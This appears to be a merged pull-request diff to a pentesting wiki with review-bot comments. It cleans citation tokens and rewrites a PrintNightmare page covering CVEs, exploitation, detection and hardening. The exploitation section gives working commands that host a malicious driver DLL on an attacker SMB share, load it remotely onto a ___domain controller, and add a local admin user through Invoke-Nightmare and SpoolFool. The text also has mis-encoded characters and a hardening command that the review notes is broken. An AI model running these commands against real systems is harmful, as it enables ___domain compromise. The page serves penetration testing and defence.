Research Update Enhanced src/windows-hardening/active-direct... #1105
Merged
Expand Up @@ -61,15 +61,15 @@ Java.perform(function () {
});
});
```
Frida will work out of the box on PAC/BTI-enabled devices (Pixel 8/Android 14+) as long as you use frida-server 16.2 or later – earlier versions failed to locate padding for inline hooks. ξˆ€citeξˆ‚turn5search2ξˆ‚turn5search0
Frida will work out of the box on PAC/BTI-enabled devices (Pixel 8/Android 14+) as long as you use frida-server 16.2 or later – earlier versions failed to locate padding for inline hooks.

---

### Recent vulnerabilities worth hunting for in APKs

| Year | CVE | Affected library | Notes |
|------|-----|------------------|-------|
|2023|CVE-2023-4863|`libwebp` ≀ 1.3.1|Heap buffer overflow reachable from native code that decodes WebP images. Several Android apps bundle vulnerable versions. When you see a `libwebp.so` inside an APK, check its version and attempt exploitation or patching.| ξˆ€citeξˆ‚turn2search0|
|2023|CVE-2023-4863|`libwebp` ≀ 1.3.1|Heap buffer overflow reachable from native code that decodes WebP images. Several Android apps bundle vulnerable versions. When you see a `libwebp.so` inside an APK, check its version and attempt exploitation or patching.| |
|2024|Multiple|OpenSSL 3.x series|Several memory-safety and padding-oracle issues. Many Flutter & ReactNative bundles ship their own `libcrypto.so`.|

When you spot *third-party* `.so` files inside an APK, always cross-check their hash against upstream advisories. SCA (Software Composition Analysis) is uncommon on mobile, so outdated vulnerable builds are rampant.
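Review bot: the rewritten CVE-2023-4863 row still ends with an extra empty cell (`| |`), so it has five cells against a four-column header and will render misaligned; drop the trailing `| |` so the row ends after `...or patching.|`. The `≀` in the `libwebp ≀ 1.3.1` cell is a mis-encoded `≤` and is worth fixing in the same edit, since it survives from the old line into the new one.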
Expand All @@ -92,7 +92,7 @@ When you spot *third-party* `.so` files inside an APK, always cross-check their

### References

- Frida 16.x change-log (Android hooking, tiny-function relocation) – [frida.re/news](https://frida.re/news/) ξˆ€citeξˆ‚turn5search0
- NVD advisory for `libwebp` overflow CVE-2023-4863 – [nvd.nist.gov](https://nvd.nist.gov/vuln/detail/CVE-2023-4863) ξˆ€citeξˆ‚turn2search0
- Frida 16.x change-log (Android hooking, tiny-function relocation) – [frida.re/news](https://frida.re/news/)
- NVD advisory for `libwebp` overflow CVE-2023-4863 – [nvd.nist.gov](https://nvd.nist.gov/vuln/detail/CVE-2023-4863)

{{#include ../../banners/hacktricks-training.md}}
Expand Up @@ -106,7 +106,7 @@ Recent Frida releases (>=16) automatically handle pointer authentication and oth

### Automated dynamic analysis with MobSF (no jailbreak)

[MobSF](https://mobsf.github.io/Mobile-Security-Framework-MobSF/) can instrument a dev-signed IPA on a real device using the same technique (`get_task_allow`) and provides a web UI with filesystem browser, traffic capture and Frida console【turn6view0†L2-L3】. The quickest way is to run MobSF in Docker and then plug your iPhone via USB:
[MobSF](https://mobsf.github.io/Mobile-Security-Framework-MobSF/) can instrument a dev-signed IPA on a real device using the same technique (`get_task_allow`) and provides a web UI with filesystem browser, traffic capture and Frida console【†L2-L3】. The quickest way is to run MobSF in Docker and then plug your iPhone via USB:

```bash
docker pull opensecurity/mobile-security-framework-mobsf:latest
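Review bot: the citation cleanup in the MobSF paragraph is incomplete: `【turn6view0†L2-L3】` was reduced to `【†L2-L3】` rather than removed, leaving a dangling bracket after "Frida console". Delete the whole `【†L2-L3】` token so the sentence ends at "Frida console." like the other lines this PR cleans up.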
4 changes: 2 additions & 2 deletions src/pentesting-web/sql-injection/ms-access-sql-injection.md
Expand Up @@ -141,7 +141,7 @@ Point the UNC path to:
* a host that drops the TCP handshake after `SYN-ACK`
* a firewall sinkhole

The extra seconds introduced by the remote lookup can be used as an **out-of-band timing oracle** for boolean conditions (e.g. pick a slow path only when the injected predicate is true). Microsoft documents the remote database behaviour and the associated registry kill-switch in KB5002984. ξˆ€citeξˆ‚turn1search0
The extra seconds introduced by the remote lookup can be used as an **out-of-band timing oracle** for boolean conditions (e.g. pick a slow path only when the injected predicate is true). Microsoft documents the remote database behaviour and the associated registry kill-switch in KB5002984.

### Other Interesting functions

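Review bot: with the citation marker gone, "Microsoft documents the remote database behaviour and the associated registry kill-switch in KB5002984." is the only pointer to that article and carries no link; add the support.microsoft.com entry for KB5002984 to the file's references so the registry setting the text relies on can be verified.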
Expand Down Expand Up @@ -229,7 +229,7 @@ Mitigations (recommended even for legacy Classic ASP apps):
* Block outbound SMB/WebDAV at the network boundary.
* Sanitize / parameterise any part of a query that may end up inside an `IN` clause.

The forced-authentication vector was revisited by Check Point Research in 2023, proving it is still exploitable on fully patched Windows Server when the registry key is absent. ξˆ€citeξˆ‚turn0search0
The forced-authentication vector was revisited by Check Point Research in 2023, proving it is still exploitable on fully patched Windows Server when the registry key is absent.

### .mdb Password Cracker

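Review bot: same gap as in the KB5002984 hunk: "revisited by Check Point Research in 2023" now has nothing behind it. Link the Check Point Research write-up in the references section, otherwise the claim that the forced-authentication vector is still exploitable on fully patched Windows Server is unverifiable from the page.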
102 changes: 99 additions & 3 deletions src/windows-hardening/active-directory-methodology/printnightmare.md
@@ -1,10 +1,106 @@
# PrintNightmare
# PrintNightmare (Windows Print Spooler RCE/LPE)

{{#include ../../banners/hacktricks-training.md}}

**Check this awesome blog post about PrintNightmare in 2024: [https://www.hackingarticles.in/understanding-printnightmare-vulnerability/](https://www.hackingarticles.in/understanding-printnightmare-vulnerability/)**
> PrintNightmare is the collective name given to a family of vulnerabilities in the Windows **Print Spooler** service that allow **arbitrary code execution as SYSTEM** and, when the spooler is reachable over RPC, **remote code execution (RCE) on ___domain controllers and file servers**. The most-widely exploited CVEs are **CVE-2021-1675** (initially classed as LPE) and **CVE-2021-34527** (full RCE). Subsequent issues such as **CVE-2021-34481 (β€œPoint & Print”)** and **CVE-2022-21999 (β€œSpoolFool”)** prove that the attack surface is still far from closed.

{{#include ../../banners/hacktricks-training.md}}
---

## 1. Vulnerable components & CVEs

| Year | CVE | Short name | Primitive | Notes |
|------|-----|------------|-----------|-------|
|2021|CVE-2021-1675|β€œPrintNightmare #1”|LPE|Patched in June 2021 CU but bypassed by CVE-2021-34527|
|2021|CVE-2021-34527|β€œPrintNightmare”|RCE/LPE|AddPrinterDriverEx allows authenticated users to load a driver DLL from a remote share|
|2021|CVE-2021-34481|β€œPoint & Print”|LPE|Unsigned driver installation by non-admin users|
|2022|CVE-2022-21999|β€œSpoolFool”|LPE|Arbitrary directory creation β†’ DLL planting – works after 2021 patches|

All of them abuse one of the **MS-RPRN / MS-PAR RPC methods** (`RpcAddPrinterDriver`, `RpcAddPrinterDriverEx`, `RpcAsyncAddPrinterDriver`) or trust relationships inside **Point & Print**.

## 2. Exploitation techniques

### 2.1 Remote Domain Controller compromise (CVE-2021-34527)

An authenticated but **non-privileged** ___domain user can run arbitrary DLLs as **NT AUTHORITY\SYSTEM** on a remote spooler (often the DC) by:

```powershell
# 1. Host malicious driver DLL on a share the victim can reach
impacket-smbserver share ./evil_driver/ -smb2support

# 2. Use a PoC to call RpcAddPrinterDriverEx
python3 CVE-2021-1675.py victim_DC.___domain.local 'DOMAIN/user:Password!' \
-f \
'\\attacker_IP\share\evil.dll'
```

Popular PoCs include **CVE-2021-1675.py** (Python/Impacket), **SharpPrintNightmare.exe** (C#) and Benjamin Delpy’s `misc::printnightmare / lsa::addsid` modules in **mimikatz**.

### 2.2 Local privilege escalation (any supported Windows, 2021-2024)

The same API can be called **locally** to load a driver from `C:\Windows\System32\spool\drivers\x64\3\` and achieve SYSTEM privileges:

```powershell
Import-Module .\Invoke-Nightmare.ps1
Invoke-Nightmare -NewUser hacker -NewPassword P@ssw0rd!
```

### 2.3 SpoolFool (CVE-2022-21999) – bypassing 2021 fixes

Microsoft’s 2021 patches blocked remote driver loading but **did not harden directory permissions**. SpoolFool abuses the `SpoolDirectory` parameter to create an arbitrary directory under `C:\Windows\System32\spool\drivers\`, drops a payload DLL, and forces the spooler to load it:

```powershell
# Binary version (local exploit)
SpoolFool.exe -dll add_user.dll

# PowerShell wrapper
Import-Module .\SpoolFool.ps1 ; Invoke-SpoolFool -dll add_user.dll
```

> The exploit works on fully-patched Windows 7 β†’ Windows 11 and Server 2012R2 β†’ 2022 before February 2022 updates

---

## 3. Detection & hunting

* **Event Logs** – enable the *Microsoft-Windows-PrintService/Operational* and *Admin* channels and watch for **Event ID 808** β€œThe print spooler failed to load a plug-in module” or for **RpcAddPrinterDriverEx** messages.
* **Sysmon** – `Event ID 7` (Image loaded) or `11/23` (File write/delete) inside `C:\Windows\System32\spool\drivers\*` when the parent process is **spoolsv.exe**.
* **Process lineage** – alerts whenever **spoolsv.exe** spawns `cmd.exe`, `rundll32.exe`, PowerShell or any unsigned binary .

## 4. Mitigation & hardening

1. **Patch!** – Apply the latest cumulative update on every Windows host that has the Print Spooler service installed.
2. **Disable the spooler where it is not required**, especially on Domain Controllers:
```powershell
Stop-Service Spooler -Force
Set-Service Spooler -StartupType Disabled
```
3. **Block remote connections** while still allowing local printing – Group Policy: `Computer Configuration β†’ Administrative Templates β†’ Printers β†’ Allow Print Spooler to accept client connections = Disabled`.
4. **Restrict Point & Print** so only administrators can add drivers by setting the registry value:
```cmd
reg add "HKLM\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint" \
/v RestrictDriverInstallationToAdministrators /t REG_DWORD /d 1 /f
```
Detailed guidance in Microsoft KB5005652

---

## 5. Related research / tools

* [mimikatz `printnightmare`](https://github.com/gentilkiwi/mimikatz/tree/master/modules) modules
* SharpPrintNightmare (C#) / Invoke-Nightmare (PowerShell)
* SpoolFool exploit & write-up
* 0patch micropatches for SpoolFool and other spooler bugs

---

**More reading (external):** Check the 2024 walk-through blog post – [Understanding PrintNightmare Vulnerability](https://www.hackingarticles.in/understanding-printnightmare-vulnerability/)

{{#include ../../banners/hacktricks-training.md}}

## References

* Microsoft – *KB5005652: Manage new Point & Print default driver installation behavior*
<https://support.microsoft.com/en-us/topic/kb5005652-manage-new-point-and-print-default-driver-installation-behavior-cve-2021-34481-873642bf-2634-49c5-a23b-6d8e9a302872>
* Oliver Lyak – *SpoolFool: CVE-2022-21999*
<https://github.com/ly4k/SpoolFool>
{{#include /banners/hacktricks-training.md}}
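Review bot: the `cmd` block under mitigation 4 splits `reg add ...` across two lines with a trailing `\`, which cmd.exe does not treat as a line continuation; it will execute `reg add "HKLM\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint" \` on its own and fail, so readers copying the hardening step will not get the `RestrictDriverInstallationToAdministrators` value set. Put the command on one line or continue it with `^`. Two smaller points in the same hunk: the training banner include now appears three times (after the title, after "More reading", and the final `{{#include /banners/hacktricks-training.md}}`, whose path also differs from the `../../banners/` form used elsewhere in the file), so keep one at the top and one at the bottom with the same path; and the quotes and arrows in the CVE table and in mitigation 3 are mis-encoded (`β€œ`, `β†’`) and should be re-saved as UTF-8 `“ ” →` before merge.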